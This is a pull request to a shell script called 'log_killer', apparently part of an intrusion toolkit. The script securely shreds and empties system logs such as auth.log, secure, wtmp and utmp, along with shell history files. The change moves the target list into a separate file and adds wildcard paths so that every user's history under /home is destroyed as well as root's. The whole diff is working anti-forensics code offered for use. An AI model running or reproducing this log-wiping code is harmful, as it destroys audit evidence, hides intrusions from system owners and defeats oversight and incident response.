### PR TITLE
fixed the history file shredding problem

### DIFF
--- a/assets/scripts/log_killer
+++ b/assets/scripts/log_killer
@@ -2,9 +2,8 @@
 
 start_log_killer(){
 
-log_list=( "/var/log/messages" "/var/log/auth.log" "/var/log/kern.log" "/var/log/cron.log" "/var/log/maillog" "/var/log/boot.log" "/var/log/mysqld.log" "/var/log/secure" "/var/log/utmp" "/var/log/wtmp " "/var/log/yum.log" "/var/log/system.log" "/var/log/DiagnosticMessages" "~/.zsh_history" "~/.bash_history")
 
-for log in ${log_list[@]}; do
+for log in `cat ../sources/log_list`; do
 	if [ -f "$log" ];then
 		shred -vfzu $log && :> $log
 	fi

--- a/assets/sources/log_list
+++ b/assets/sources/log_list
@@ -1,0 +1,9 @@
+/var/log/*.log
+/var/log/messages
+/var/log/maillog
+/var/log/secure
+/var/log/utmp
+/var/log/wtmp
+/var/log/DiagnosticMessages
+/root/.*history
+/home/*/.*history


### PR DESCRIPTION
I had noted the log_killer module didn't destroy the ~/.bash_history and ~/.zsh_history because since they were ran as root,they would only destroy /root/.bash_history and /root/.zsh_history,and not /home/<username>/.bash_history or /home/<username>/.zsh_history.

This PR fixes the problem